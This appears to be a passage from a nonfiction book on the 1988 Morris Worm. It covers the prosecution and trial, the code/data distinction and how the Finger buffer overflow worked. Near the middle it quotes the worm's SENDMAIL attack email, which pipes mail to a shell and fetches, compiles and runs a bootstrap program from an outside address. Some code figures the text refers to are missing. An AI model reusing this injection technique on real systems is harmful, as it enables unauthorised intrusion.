While the Department of Justice dithered over whether to charge Robert Morris Jr. with a federal crime, the computer community split over whether it should. Eugene Spafford, an assistant computer-science professor at Purdue University, emerged as an antihacking crusader and forceful proponent of prosecution. “Some of those same people are claiming that Robert Morris should not be prosecuted because he did us a favor, and it was somehow our fault for not fixing the problems sooner,” Spafford wrote on an internet bulletin board. “That attitude is completely reprehensible! That is the exact same attitude that places the blame for a rape on the victim; I find it morally repugnant.”
Cornell University also strongly condemned Robert. M. Stuart Lynn, Cornell’s vice president of information technologies, channeled his inner schoolmarm: “We don’t consider it a great hack: it takes time away from productive work, and we don’t think it’s funny.” The Cornell president withheld his decision on whether to expel Robert, not wanting to influence the FBI. But the Feds were taking so long that he was forced to disclose it. The commission he convened to investigate the incident concluded that the hack was “a juvenile act that ignored the clear potential consequences” and recommended expulsion, which the president accepted. Robert was permitted to reapply the following year.
Others were more sympathetic. Robert’s defenders noted that his intentions were not malicious. The worm did not destroy files or cause permanent damage. Robert Morris was experimenting, and experimentation is the essence of hacker culture. And he exposed dangerous vulnerabilities and sloppy practices of network administrators, thereby making the internet safer. Peter Neumann predicted that history would vindicate Morris: “When all is said and done, this kid is going to come down as a folk hero.”
Paul Graham made the economic case for his friend’s unusual behavior. “The fact that the United States dominates the world in software is not a matter of technology,” he told The New York Times. “The culture for making great software is slightly crazy people working late at night.” If the United States wished to remain a technological superpower, it had to tolerate weird people doing weird things.
Robert Morris Jr. polarized the computer community not only over the ethics of hacking, but also on how to describe his hack. While the media called Morris’s creation a “worm,” some researchers insisted on calling it a “virus.” At conferences, whenever the worm people used “worm,” the virus people would yell, “Virus!”—as if they were at The Rocky Horror Picture Show shouting corrections at the movie screen.
Computer scientists also disagreed about the level of sophistication. Bob Morris had been impressed by his son’s coding prowess, claiming that only a few dozen people in the country could have pulled off a similar feat. Spafford, however, was dismissive: “One conclusion that may surprise some people is that the quality of the code is mediocre, and might even be considered poor.” Dexter Kozen, one of Robert’s professors, split the middle: “It took some technical wherewithal, but not necessarily brilliance.”
Several parts of the worm were pedestrian. The first attack vector—using trusted hosts to spread from computer to trusted computer—was an obvious tactic. The second attack vector—using the backdoor in SENDMAIL—also required little skill to perpetrate. This backdoor is easy to open once you know it’s there. The third vector—guessing passwords—is a brute-force attack that does not require much coding talent either. In fact, Morris’s father wrote about this type of attack in an article with Ken Thompson published in 1979.
The fourth vector—the attack on Finger—was inspired, however. Even Eugene Spafford was impressed. In a comment buried deep in the decompiled code that the UNIX administrators deciphered when dissecting the worm, Spafford conceded, “What this routine does is actually kind of clever.” We will examine this attack in this chapter. We won’t try to rate whether this attack on Finger was brilliant, competent, or poor—we examine it because it is an excellent example of how hacking works in general and will serve as a template for understanding other types of attacks.
But before we explain how Robert Morris exploited the Finger program, we need to introduce some philosophy.
Achilles and the Tortoise
In 1895, Lewis Carroll—the pen name of the Anglican deacon Charles Dodgson, who wrote Alice’s Adventures in Wonderland—published a short, quirky article in the philosophy journal Mind entitled “What the Tortoise Said to Achilles.” The piece revisited the famous paradox of Zeno purporting to show that fleet-footed Achilles can never beat the sluggish Tortoise if the Tortoise is given a head start. In Zeno’s telling, Achilles can never win the race because whenever he’s about to catch up to the Tortoise, the Tortoise will have moved even closer to the finish line.
In Lewis Carroll’s version, Achilles can never beat the Tortoise in an argument. Every time Achilles tries to reach the end, the Tortoise adds another premise to the argument before Achilles can draw his inference.
As one would expect from Lewis Carroll, his take on the Tortoise- and-Achilles parable is not only clever, but also charming, written with his trademark Victorian wit and whimsy. I am therefore going to ruin it completely by transposing it into the modern world of digital computers.
The updated parable begins with Achilles taunting the Tortoise for being so old. “You’re so over the hill, my reptile friend, that you’re going to die any minute.” The Tortoise replies that Achilles is wrong (as well as ageist). He concedes to Achilles that he is a reptile. He also admits that all reptiles are mortal. The Tortoise claims, nevertheless, to be immortal.
To show that the Tortoise is indeed mortal, Achilles writes a computer program that solves logic problems. His program is primitive—Achilles is a fighter, not a coder.
When Achilles runs his program, it prompts him to enter the premises of the argument. On his keyboard, Achilles types, “The Tortoise is a reptile,” hits Enter, types, “All reptiles are mortal,” and hits Enter again. The program prints out, “The Tortoise is mortal.”
Achilles is proud of himself for having beaten the Tortoise. As his logic program demonstrates, the conclusion “The Tortoise is mortal” follows from premises A and B.
The Tortoise points out that the conclusion that he is mortal follows from A and B only if the program is correct. But how do we know that the program prints out the right conclusion given the inputted premises? The Tortoise challenges Achilles to prove to the Tortoise that he is mortal using a program that does not contain the untrusted code.
Achilles is confident that the Tortoise is mortal. After all, if the Tortoise is a reptile, and all reptiles are mortal, then surely the Tortoise is mortal. What could be more obvious than this?
Accordingly, Achilles deletes the line of code containing the Print statement. Here is his new program:
When Achilles runs the revised program, nothing happens. He enters, “The Tortoise is a reptile” and “All reptiles are mortal,” but nothing prints out.
After debugging his logic program, version 2.0, Achilles discovers the problem. For his program to output a conclusion from the inputted premises, he needs downcode that will instruct the computer to print out the answer when it receives the premises it needs. By deleting the code with the Print command, he removed the instruction to furnish the conclusion.
Achilles tries a new tack. If the Tortoise cannot see that the original program is correct, Achilles will construct a new argument that makes the program’s logic even more explicit. (Call the new premise “C.”)
The Tortoise may not see how being mortal follows from A and B, Achilles thinks, but surely he’ll see how being mortal follows from A, B, and C. After all, C says that the Tortoise is mortal when A and B are true. If A, B, and C are true, then the Tortoise has to be mortal.
Excited by his new idea, Achilles writes two more lines of code:
When Achilles runs version 3.0 of his program, and enters A, B, and C, he gets “The Tortoise is mortal,” as expected.
The Tortoise is unmoved. After all, this second program uses the same logic as the first one. And if the Tortoise doesn’t trust the first program, he won’t trust the output of the second program.
To oblige the Tortoise’s skepticism, Achilles deletes the line of code with the Print statement. Achilles is certain that the Tortoise’s being mortal follows from A, B, and C. All he needs to do is input these premises into his computer and it will draw the obviously correct inference. His new program looks like this:
Unsurprisingly, this new program fails. (After a couple more rounds with the Tortoise, Achilles tires and quits.)
What’s gone wrong here? To see how the Tortoise keeps tricking Achilles, let’s discuss the difference between code and data.
Code and Data
Let’s start with code. Code is a set of instructions, such as “Add,” “Print my résumé,” and “Shut the door.” Code is active—it tells someone or something to perform actions under certain conditions.
Achilles’ program, for example, tells the computer to print “The Tortoise is mortal” if “The Tortoise is a reptile” and “All reptiles are mortal” are inputted.
The opposite of code is data. While code is active, data is passive. It does not act—it is acted upon. It is inputted into code for processing. Thus, the instruction “__ + __” can take 2 and 2 as data. When run (or, as computer people say, executed), the code returns the number 4.
The premises of the Tortoise’s argument—A, B, and C—are the data. It is a datum that the Tortoise is a reptile. It is another datum that all reptiles are mortal. These data are fed into the computer in a language the computer understands for processing by its downcode.
Code and data are not interchangeable because they have different functions. Code is supposed to act; data is supposed to be acted upon. If you take code and treat it like data, you are removing something that acts. It is no surprise that Achilles’ program failed without its main line of code.
The danger of confusing data and code is high because code often looks like data and vice versa. Compare these two statements (for clarity, code symbols are darker font, data symbols in lighter italics):
Both look similar. The first statement says that if the user inputs “The Tortoise is a reptile” and “All reptiles are mortal,” the program should print “The Tortoise is mortal.” The second statement, which is the same as premise C from the last example, says that if “The Tortoise is a reptile” and “All reptiles are mortal” are both true, then “The Tortoise is mortal” is also true.
The difference between these statements is conspicuous. The first one is code because it contains an instruction: if certain conditions are true, then print “The Tortoise is mortal.” The second statement, on the other hand, doesn’t direct the computer to do anything. It simple states a relationship between the truth of certain sentences, namely, if A and B are true, then “The Tortoise is mortal” is also true. The second statement, therefore, is data.
Code can look almost exactly like data. Compare these two statements:
At first glance, the first statement looks like data. It says that B is the statement “All reptiles are mortal,” which seems like the statement in the next line. But they are not equivalent. The first statement is code because it instructs the computer to assign a value to B, namely, to make B be the string “All reptiles are mortal.” The next line, by contrast, is data because it doesn’t tell anyone to do anything: it states a datum, tells us what is the case. It simply says that all reptiles are mortal.
Code instructs, data represents. If you want to take some action based on conditions, use code. If you want to represent a state of the world, use data. Mix the two up and you’re in trouble.
The moral of the Tortoise-Achilles fable, therefore, is that code and data are not interchangeable. If you take some downcode out and input it as data, your new program is unlikely to run correctly. Achilles’ logic program cannot function without some code instructing the computer to print out a conclusion when the premises are entered. Converting a line of code to C is not sufficient because C doesn’t instruct the computer to do anything. It is just a statement, not an instruction. You can input as many premises as you want into a logic program. But if the program doesn’t have code to draw inferences, it will be useless.
As we will see, that’s precisely how Robert Morris hacked the Finger service. He fed the program code (the bootstrap program for the worm) when it was expecting data (a username). Robert Morris was the Tortoise, and the rest of the computer community was Achilles.
Criminal Upcode
In the early 1970s, the criminal law in the United States had no computer- specific offenses. To deal with the new problem of computer hacking, prosecutors were forced to improvise with existing upcode. One possible crime to use was trespass. Just as I commit trespass when I pass onto your property without your consent, a hacker commits trespass when breaking into a computer account without the user’s permission.
Unfortunately, the crime of trespass is a bad fit for hacking. Here, for example, is the New York State trespass statute:
§140.10 Criminal trespass: A person is guilty of criminal trespass in the third degree when he knowingly enters or remains unlawfully in a building or upon real property.
This statute is typical in that it makes trespass a physical crossing of a border, or physical presence in a building, in violation of the law. It is so explicit about its physicality—the offender must enter or remain in any building or real property—that hackers violate the statute only when they literally climb into the computer.
Courts were more amenable to theft as a charge for hacking. Just as I might steal your wallet when in your house, hackers can steal information when they break into computer accounts without permission. Robert Morris Jr. could not be charged with theft, however, because he did not steal any information.
Had Robert released his worm a few years earlier, he might have evaded the attention of the FBI. However, Congress made prosecuting hackers far easier when they enacted the CFAA in 1986. The CFAA created two tiers of offenses—certain computer intrusions were deemed misdemeanors, punishable by fine and/or up to a year in jail, whereas others were treated as felonies, with punishments including fines and/or five to twenty years in jail.
The two most plausible charges against Robert Morris Jr. were Section (a)(3) of the CFAA, which criminalized as a misdemeanor the mere intrusion into a government computer—a form of computer trespass—and Section (a)(5), which prohibited as a felony any such intrusion causing a loss of at least $1,000, punishable by up to five years. Given the amount of maintenance and repair generated by the worm, the monetary damage easily exceeded $1,000.
The Department of Justice could not decide whether to charge Robert with the misdemeanor, Section (a)(3), or the felony, Section (a)(5). Many considerations counseled leniency. Robert did not mean to cause the damage and was horrified when he found out that he had. Morris was a young man with no criminal history; he was not motivated by profit; he was not in the service of a foreign government; and he took measures to stop the harm he was causing. And yet, for all the mitigating circumstances, there was no getting around the fact that Robert Morris Jr. had intentionally released malicious code on the internet and caused an enormous amount of damage. A lenient charge would send the wrong signal. If the biggest hack in internet history counted as a mere misdemeanor, the DOJ would not appear to take the CFAA seriously.
The concerns were not just of law enforcement policy, but also of legal interpretation. In contrast to computer downcode, which is formal and can be parsed in only one way, legal upcode is informal and thus subject to alternative constructions. For example, Section (a)(5) made it a crime if any person “intentionally accesses” a federal-interest computer without authorization and causes losses of more than $1,000. Morris intentionally accessed such computers without authorization—that was indisputable—but he denied he intentionally caused damage. Did Section (a)(5) require intentional access without authorization and the intentional causing of damage? If so, then Robert had not committed a felony. But if the provision required only intent for access, but not for damage, then he could be charged with the more severe offense.
Despite rumors that federal prosecutors would offer Robert the chance to plead guilty to a misdemeanor, they ultimately decided to charge Morris with a felony. On July 26, 1989, a grand jury in Syracuse, New York, approved a one-count indictment, alleging that on November 2, 1988, Robert Tappan Morris Jr. “intentionally and without authorization” accessed computers at institutions such as UC Berkeley, NASA, and the US Air Force, “prevented the authorized use” of these computers, and “caused a loss” of at least $1,000.
Robert, his lawyer, and his family trekked up from Maryland to the federal courthouse in Syracuse for the arraignment. Robert pleaded not guilty. The trial was scheduled to begin in the dead of winter.
Jury as a Computer
Given that few Americans had heard of the internet before the Morris Worm, and that the indictment charged the defendant with a new crime, any jury would have difficulties sorting through the facts of the case, applying the law, and rendering a verdict. But the lawyers in the case faced an even bigger problem: not one juror owned a computer, and only two had ever used one at work. Robert Morris did not get a jury of his peers. He got a jury of noobs.
Fortunately for the government, Mark Rasch was an experienced prosecutor in the field of computer crime—perhaps the most experienced in the country. A graduate of the Bronx High School of Science, he was one of the few lawyers at the Department of Justice who worked on computer crimes. And as a native of upstate New York—having been born in Rochester and gone to law school in Buffalo—Rasch was confident yet affable, an ideal combination for addressing the Syracuse jury.
Rasch specialized in addressing juries of laypeople. He was able to bypass the technicalities of computer hacking and make jurors understand the issues at stake. He began his opening statement on January 9, 1990, with a powerful presentation of the case: “The government will prove beyond a reasonable doubt … that there was a full-scale assault on the computers throughout the United States, launched by the defendant, Robert Tappan Morris, on November 2, 1988.” Robert Morris’s full-scale assault was so dangerous, Rasch explained, because important people use the internet for important jobs. “These people maintained these computers not just at government sites, not just at military sites, but at commercial facilities, at private companies throughout the country, and many of the people you will hear testimony from worked at different universities doing scientific research. Their research was interrupted. They couldn’t do their work because of the actions of the defendant, Robert Tappan Morris. Valuable computer time was lost. Valuable experiments were lost.”
Rasch used well-chosen analogies to help the jurors understand how the worm functioned. He equated computer passwords, which most jurors had never used, with “the PIN number that you use when you go to the banking machine.” He explained the worm using a medical analogy: “Just like with a regular virus, if you just have one virus, you may not get very sick, but if you get many viruses, if you have hundreds, you will get very sick. Not only will you get very sick, you will get other people sick.”
Rasch understood, however, that he did not need to teach the jurors exactly how the internet, computers, or worms worked. He merely needed to convince them beyond a reasonable doubt that the conditions in the criminal code were met—which he planned to do by calling a long list of computer administrators as witnesses to testify that Morris’s worm accessed their computers without authorization, prevented their use, and caused them to waste significant time, effort, and money. For the most part, the jurors could trust these experts.
The case of United States v. Robert Tappan Morris was challenging not only because it concerned advanced technology with which the jurors had little to no experience. The criminal law was technical as well, and the jurors had to process its requirements, too. Rasch, therefore, spent part of his opening argument examining the technical requirements of the upcode set out in Section (a)(5) of the CFAA—what lawyers call the “elements” of the crime. The government intended to prove beyond a reasonable doubt that “Robert Tappan Morris, intentionally and [1] without authorization [2] accessed these computers … and by that means [3] prevented the authorized use of those computers … and [4] thereby caused a loss, and I will tell you about that in just a moment, a loss of at least one thousand dollars.”
Using experts, Rasch sought to establish that Robert Morris satisfied the four elements set out in the statute. These experts could not, however, credibly testify to Robert Morris’s state of mind, namely, that he broke into the computers intentionally. They could not establish what lawyers call mens rea—a guilty mind. To do so, Rasch planned on calling Paul Graham and Andy Sudduth to testify and establish for the jury that their friend acted deliberately.
Rasch was careful to add that he did not regard Robert Morris as “evil.” “The government does not intend to prove that Mr. Morris intended to cause this loss.” But that Morris was not planning on crashing the internet was legally immaterial—all that mattered was that he intended to break into computers and that a loss resulted.
Rasch’s case was considerably aided by his adversary, Morris’s attorney, Thomas Guidoboni, not contesting his story. Guidoboni fully conceded that Robert Morris Jr. did what Rasch said he did.
In his opening statement, Guidoboni tried to minimize the harm his client caused by challenging Rasch’s solemn depiction of the internet. “You will hear evidence that such majestic uses as playing chess, sending love letters, sending recipes, this kind of thing—graduate students basically could use it to send these kinds of messages: ‘Hello, how are you?’ ‘We have hockey practice today.’ ‘I just got back from vacation.’ And a lot of time was used for that.” Aside from several small qualifications, Guidoboni accepted the facts of the prosecution’s case. Rather, he contested its interpretation of the law. While Guidoboni admitted that his client intentionally built and released the worm, he claimed that the damage he caused was unintentional. And because the success of the worm was a mistake, it wasn’t a crime. “Now we submit to you, however, that a simple mistake, a mistake together with embarrassment and some inconvenience, are not the equivalent of a federal felony offense.”
The defense strategy turned the normal legal procedure upside down. Trials are supposed to focus on the facts, not the law. The judge supplies the legal upcode, the attorneys contest the data provided by witnesses and other evidence. The principal question of every criminal trial is whether the prosecution has shown beyond a reasonable doubt that the factual conditions set out in the legal upcode are satisfied. If so, jurors are obligated to return a verdict of guilty; otherwise, they must return not guilty.
Juries, we might say, are like legal computers. The judge loads the upcode, the attorneys supply the data, and the jury outputs a verdict. Whereas trials are normally about data, Guidoboni turned it into a debate about code. Should the law punish a hacker who merely released a worm onto the internet but did not intend to cause damage? Or should the law deem this lack of an intent a “mistake” and hence not punishable as a felony?
Guidoboni wanted the jury to follow his lead on the law. Unfortunately, the judge, Howard Munson, had ruled otherwise before the trial even began. On Judge Munson’s interpretation, intention to create damage is unnecessary for a felony conviction. He was almost certainly going to instruct the jury to follow his interpretation of the law at the end of the trial.
Guidoboni’s strategy, therefore, was for the jury to ignore the judge and follow Guidoboni instead. This risky gambit—to hope that the jury malfunctioned in such a fundamental way—was the only option he had.
The Ambiguity of Code and Data
The lesson of Lewis Carroll’s parable of the Tortoise and Achilles is to never confuse code with data. Since each has different functions, swapping them out usually ends badly, with the program crashing.
Code and data not only have different functions. They are also assessed by different standards. Code can be good or bad. It can either carry out its function well or poorly. Or the goal that it aims to produce can be either valuable or pernicious. Data, on the other hand, cannot be good or bad. It can only be true or false. It makes no sense to ask if the data is good—you can ask only whether it correctly represents the world. If so, it is true, accurate, or correct; if not, it is false, erroneous, or flawed.
The differences between code and data are so fundamental that one would think that we can distinguish the two just by looking at them. Does a statement give an instruction? Then it’s code. Does the statement represent reality? Then it’s data. Case closed.
Not so fast. As Alan Turing showed in 1936, any expression that represents code or data can be turned into a number. Call this the “duality principle.” The duality principle maintains that code and data can both be represented by numerical symbols. Since numerical symbols can represent either code or data, one cannot tell which they represent just by looking at them.
That data can be represented by numbers is obvious (e.g., current temperature = 80°). That code can be represented by numbers is less so. But as Turing demonstrated, converting code to numbers is surprisingly simple.
To see how any statement containing an instruction can be turned into a number and then a binary string, consider the following encoding scheme:
Pick a line of code, take each symbol in that line, and match it with the number in the above table:
The sequence of numbers encodes the instruction from Achilles’ first program. While it looks like a sequence of data, it was constructed from code, from an instruction to print “The Tortoise is mortal” if A and B are entered.We can even take this sequence and compress into a single number. (Mathematical details are in the endnote. You’re welcome.) That number turns out to be 23,240,679,795,235,306,981,511,472,582,645,791,189,105,998,211,999, 427,866, or over twenty-three septendecillion two hundred forty sexdecillions. We can then convert this decimal number into a binary string:
11110010101001010100101011000110110011010001101110100111-01011001110011000011111010100010010010101000011000010111-11011110100011111100110001110011000011110010111111001100-1011111000100011
Turing’s discovery that code can be converted to numbers was nothing short of revolutionary, for it made digital computing possible. Because numbers can represent code or data, the principle of duality allows programmers to use the same zeros and ones to input data and code into their digital computers.
Digital computers are especially good at manipulating binary numbers. High-voltage circuits within microchips represent ones; low-voltage circuits represent zeros. Thus, using Turing’s procedure, programmers can take their code, transform it into binary numbers, and load these binary expressions onto integrated circuit chips. Our personal computers—desktops, laptops, phones—can run programs we load on them if we transform them into strings of zeros and ones that those computers can understand.
The duality principle—that numbers can represent either code or data—is a core part of the metacode upon which the entire digital world rests. It is also one of the most important philosophical discoveries of the twentieth century. Duality is especially remarkable metacode given that, as the Achilles and the Tortoise fable showed us, code and data have opposing natures. One is active, the other passive. One acts; the other is acted upon. One represents the world; the other changes it. And yet both code and data can be represented by the very same kinds of symbols, i.e., numerals. Indeed, because all numbers can be represented by binary strings, these opposites can be represented by just two numerals, 0 and 1.
That binary strings can represent code not only makes general digital computing possible; it also defines a hard upper limit on what computers can possibly do. Computers will never be able to solve many problems—an uncountably infinite number of problems, to be precise—as we will see later in this book. Indeed, the very purpose of Turing’s 1936 paper, in which he constructed a universal machine capable of running any program, was to show the limits of computation.
But before we can explore the philosophical implications of this metacode, we have a more basic question to ask: If code can be turned into numbers, just like data, how is the computer supposed to know whether a string of zeros and ones is supposed to be code or data? For example, a two hundred and forty sexdecillion binary string might represent the encoding of a line from Achilles’ program. Or it might represent data, say, the number of stars in the universe, or the number of atoms in the period at the end of this sentence. How should the computer interpret this sequence of zeros and ones?
This question is especially pressing in light of the Tortoise and Achilles parable. The moral of that story was never to confuse code and data. Since code and data do very different things, mistaking one for the other can cause calamity. How then can computers avoid the fate of Achilles, trying to use data when only code will do?
The answer is that we tell the computer which binary strings are code and which are data. Robert, for example, told his computer that the worm was code by naming its file worm.c, where c is the programming language, C, in which he wrote it. When we store our text documents in files with .txt extensions, we are telling our operating system that they contain data in the form of text.
Thus, when we designate files as code, the computer loads the information into a special memory location known as the code segment. Likewise for files designated as data, which are loaded into the data segment. The code and data segments are kept separate.
Thus, even though physical symbols are intrinsically ambiguous between code and data, humans disambiguate them for computers. They tell the computer which binary expressions should be interpreted as code and which as data. Once programmers supply the right interpretation, computers load code into one part of memory and data into another.
When the operating system runs code, it identifies the instruction to be executed by using an “instruction pointer.” Instruction pointers act like conductors pointing their batons to different sections of the orchestra when their turn comes.
It is crucial that instruction pointers never point to the data segment. If they do, the computer’s central processing unit interprets the numbers there as code. But since the programmer intended for them to be data, the numbers would be meaningless to the CPU and would cause the program to crash.
Instruction pointers, therefore, are all that stand between the computer’s operating as the programmer intended and its failing. Here is where hackers have their opportunity. They feed malicious code to a program that is expecting innocuous data, then change the instruction pointer to point to the newly introduced code—which, as we shall now see, is how Robert Morris hacked the Finger service.
Overflow!
Before cell phones and Facebook, getting ahold of friends on campus wasn’t easy. If no one within earshot knew where someone was, the best strategy was to use the university landline (what used to be called a phone) to ring that person’s dorm room. If that person didn’t pick up, you would head down to the computer room, log on to the campus network, and “finger” them. (It didn’t sound bad then.) Finger is no longer in use, but for a long time it was the best way to find people on campus.
Suppose that Paul Graham wanted to finger Robert Morris to see whether he was on the Harvard campus. He would type “finger rtm” into his UNIX machine. If Robert was on the network, Finger would respond with his location. It was fast, easy, and worked remarkably well. That is, until Robert Morris figured out how to exploit the Finger program to break into Finger servers.
When someone submits a Finger request, a Finger client sends a request to a Finger server. A client is a program that makes requests, and a server is a program that responds to requests. The Finger server takes the request from the client (the input, e.g., “rtm”), looks up the location of the person in its database of users, and “serves” the location back to the client (the output, e.g., “Aiken Lab, Machine 3”). The server is the code; the input and output are the data.
Enter the second principle of metacode, which I will call “physicality”. The physicality principle states that computation is a physical process of symbol manipulation. Your laptop, cell phone, and brain are all symbol-manipulation machines.
Physical symbol manipulation sounds complicated, but there is no mystery here. Indeed, we spend most of our early lives learning how to do it. When we are taught how to add in elementary school, we are learning how to manipulate physical symbols. (Starting from the right, add the column and write the sum below, write any carry number above the next column, add these digits…)
Since computers are physical machines for manipulating symbols, they are subject to physical limits. No computer, for example, can store an infinite number of symbols because no computer can have an infinite memory. Code and data are stored in finite memory spaces, big enough to get the job done, but not so big as to waste capacity that other programs or users can use.
When a user enters a username to look up, the Finger server temporarily stores it in a part of memory known as a data buffer. The data buffer is 512 bytes long. That’s generous. Robert Morris Jr.’s username—rtm—is only three bytes long (each character is a byte). No matter the size of the request, however, Finger stores the string in the 512-byte-long buffer, usually with plenty of room to spare. The Finger server then looks up the request in its database to see if the user is on the network.
That’s how it is supposed to work. But the programmer who built that version of Finger made a mistake. While Finger allows for a request up to 512 bytes long, it does not check to see if the request is over the limit. When a longer string is entered, Finger still tries to jam the oversize information into the data buffer. Like ten ounces poured into an eight-ounce measuring cup, the extra information spills over into adjacent parts of memory. This spillage is known as a buffer overflow.
Any such buffer overflow can overwrite important information, depending on the location of the data buffer. The server stored the data buffer in a special part of the computer’s memory known as the stack. The stack is like the scratch paper at the back of a math notebook. If the math problem is long, students will often dog-ear the page they are working on and turn to the back of the notebook to do the intermediary calculations. When they get the answer, they return to the front of the notebook and enter the answer on the dog-eared page.
When code fetches data, it temporarily places the data on the stack— jotting it down on the back pages of the computer’s memory, as it were. The code will use the stack to perform intermediate calculations. Once completed, the program will transfer the answer back to the “front pages” to continue its operations.
Here’s where the mischief begins: The Finger server does not just create a data buffer on the stack. It also “pushes” directions on the stack so that the operating system knows how to return to the server after it leaves the stack. These directions back are known as return instruction pointers—much like dog-earing pages in the front of the math notebook. Normally, overwriting the return instruction pointer would be catastrophic—it would crash the program because the computer would not know what to do after it placed data on the stack. But Morris realized that he could exploit this glitch. He could use the buffer overflow to wrest control from the computer running Finger.
Code Hiding in Data
To exploit the buffer overflow, Robert constructed a special request. Instead of sending a small string such as rtm, he sent a supersize request that was 536 bytes long. The first 512 bytes filled the data buffer set up by the Finger server. This part of the request was mostly garbage—just a meaningless binary sequence. But at the four-hundredth byte mark, Robert inserted malicious code. This code told the Finger server to stop looking up user names and cede control to the worm’s bootstrap program.
The end of the message—the last twenty-four bytes—contained a new return instruction pointer. Instead of giving the operating system directions on how to return to the server, this fake pointer directed the computer to the four-hundredth mark of the data buffer—in other words, to the malicious code hiding inside.
Thus, when Morris sent his supersize request to the Finger server, the buffer overflowed. The flood of data wiped out the return pointer back to the server and replaced it with a new instruction pointer to the malicious code in the data buffer. It’s as if the worm unfolded the original dog-ear, folded the corner of another page, and sent the student back to the wrong section of the notebook.
When Finger placed the supersize data on the stack, UNIX followed the new pointer. Except instead of returning to the server, the operating system went to the four-hundredth mark of the data buffer, found the malicious code to execute, and handed control to the worm.
Having gained control of the Finger server, what did the worm do? It told the Finger server to accept a copy of the worm’s bootstrap program. Once the server accepts the copy, the malicious code hidden in the buffer executes the bootstrap code. The bootstrap code sends for and receives a copy of all the worm’s binary files. The bootstrap code executes the worm binary files, and a new worm is born. The whole cycle begins again, with parent and child worms looking for trusted hosts, guessing passwords, sending email, and smashing the stacks of Finger servers.
The Finger attack shows how hackers can exploit network vulnerabilities. One of the main techniques that hackers use is to manipulate the ambiguity between code and data, that is, exploit the duality principle. The Finger program expected data, specifically, the name of a computer user to find. Morris instead sent code, specifically, instructions for wresting control from Finger.
Indeed, Morris used this basic technique in his SENDMAIL hack as well. Here is the email that the worm sent to hosts it wanted to infect:
mail from: </dev/null>
rcpt to: <“|sed -e ’1,/^$/’d|/bin/sh; exit 0”>
data
cd /usr/tmpcat > x14481910.c << ’EOF’
EOF
[text of bootstrap program]
c c -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;r m -f x14481910 x14481910.c
.
quit
If this email doesn’t look normal to you, that’s because it isn’t. The “mail from:” field does not contain an email address—/dev/null is UNIX-speak for “blank.” Likewise, the “rcpt to:” field isn’t an address either. It contains an instruction to run the code in the body of the email. The body of the email starts after “data.” But the next lines do not contain text such as “LOL, see you tomorrow!”—they contain code. That code tells the recipient to copy the bootstrap program of the worm from the sender. (For a description of the code, see endnote.)
Thus, both the Finger and the SENDMAIL attacks exploited the duality principle, the inherent ambiguity between code and data. When the programs expected data, the worm sent code. In both cases, the worm wrested control from UNIX.
The worm was able to exploit the distinction between code and data because computation is simply the manipulation of symbols. All a computer can make out is a series of on and off states. As far as it is concerned, a series of bits could be encoding instructions or information. It could be the name rtm, an email confirming lunch, or an algorithm for self-replication. It is the programmer’s job to provide and then enforce the right interpretation—to ensure that the program rejects code input if the program expects data input and vice versa.
Trustworthy users don’t maliciously exploit the distinction between code and data. They input data when the program expects data and input code when the program expects code. But hackers take advantage of this intrinsic ambiguity: when programs expect data, hackers send code; when programs expect code, they send data.
“He Blew It on the First Try”
Dean Krafft was pacing outside the courtroom. As the director of facilities at Cornell’s computer-science department, and the first witness to be called by the prosecution, Krafft was tasked with explaining the worm to the jury. He wondered how he would ever explain data decryption to the jurors.
Given that the jury knew nothing about cybersecurity, Krafft’s testimony was more like a crash course in computers. Rasch’s direct examination was an endless series of technical questions: “What is internet?” “Can you tell the jury what a computer password is?” “Would you tell the jury what electronic mail is?” “Can you tell the jury what a running program is?” Krafft gave clear and distinct responses to each question.
It must have been excruciating to sit through the testimony. The information conveyed was not only dry and technical, but also repetitive. In addition to Krafft, Rasch called on thirteen other system administrators to testify to the jury about how the worm had invaded their systems. They all described the same experience—how on the night of November 2, a worm infiltrated their networks and caused many nodes to crash. After a frantic search through the night and the next day to discover how to control the worm, system administrators spent valuable time eliminating the intruders, patching their systems, and bringing them back up. Each specified a dollar amount expended on the effort. The total was $475,000—well over the statutory minimum of $1,000 for a felony conviction.
The highlight of the government’s case was the testimony of Paul Graham. Paul was to provide the jury with crucial evidence about Robert’s state of mind. Paul would show beyond a reasonable doubt that his friend released the worm intentionally. Paul would also supply the missing piece of the story, the very elephant in the courtroom, namely, how a brilliant young man could have come up with such a stupid idea. As it would turn out, Paul was egging Robert on.
According to Paul’s testimony, Robert traveled to Harvard on October 22, the weekend of the Head of the Charles, the annual regatta on the Charles River. Although his friend Andy Sudduth was racing his scull, Robert was not there for the competition. Cornell was on fall break and Robert had come to Cambridge to see old friends. He spent a lot of time in Aiken Lab, the home of Harvard’s Computer Science Faculty.
Paul testified that on Friday night, he was sitting at the desk of his adviser, David Mumford. Mumford was a mathematics professor who let his advisees use the computer in his office. Robert rushed into the room overcome with excitement. “He was pacing back and forth across the room, and at the end of one of his paces he just walked right up onto Mumford’s desk. [Robert] didn’t quite realize he was standing there, I don’t think.” While standing on Paul’s adviser’s desk, Robert reported that he’d found a big security hole in UNIX.
Paul was underwhelmed. “I thought it was very uninteresting, another way of breaking into the UNIX system, big deal.” But then Robert revealed the significance of this security flaw: “I could write a program and have the things spread from computer to computer.” Paul found that idea extremely exciting. As far as he knew, no one had ever released a worm on the public internet before. The idea was so inspired that Paul suggested that Robert write the worm up as his PhD thesis.
Paul was careful to point out that his friend never intended to cause harm. Paul and Robert talked about how to construct the worm without impacting the infected accounts. “There were all sorts of design features in the virus that he could have used, but they would have risked destroying data. They were out of the question.” The boys called the worm “the brilliant project.”
Paul only learned that Robert had launched the worm on November 2, when Robert’s distraught 11:00 p.m. phone call reported how the brilliant project had run amok. According to Robert’s diagnosis, the worm was malfunctioning because he’d picked a reinfection rate that was too high. One out of seven was overloading the workstations.
Paul’s first reaction was anger at Robert—but not for the chaos he’d caused. “I said, ‘You idiot,’ because it was such a great idea and he just blew it through carelessness. I couldn’t believe it. I was so mad at first. That was really what annoyed me: it would never be possible to do this thing again, and he blew it on the first try.” Had Robert picked a higher number (say, to reinfect one out of seven hundred times), the worm would have spread harmlessly and the brilliant project would have succeeded brilliantly.
Robert Takes the Stand
Paul testified against his close friend because he had no choice. American courts have broad legal powers to compel witnesses to testify on threat of imprisonment. But the Fifth Amendment to the U.S. Constitution explicitly exempts defendants in criminal cases from testifying against themselves. The legal upcode of the United States, in other words, permits defendants to withhold incriminating testimonial data from juries.
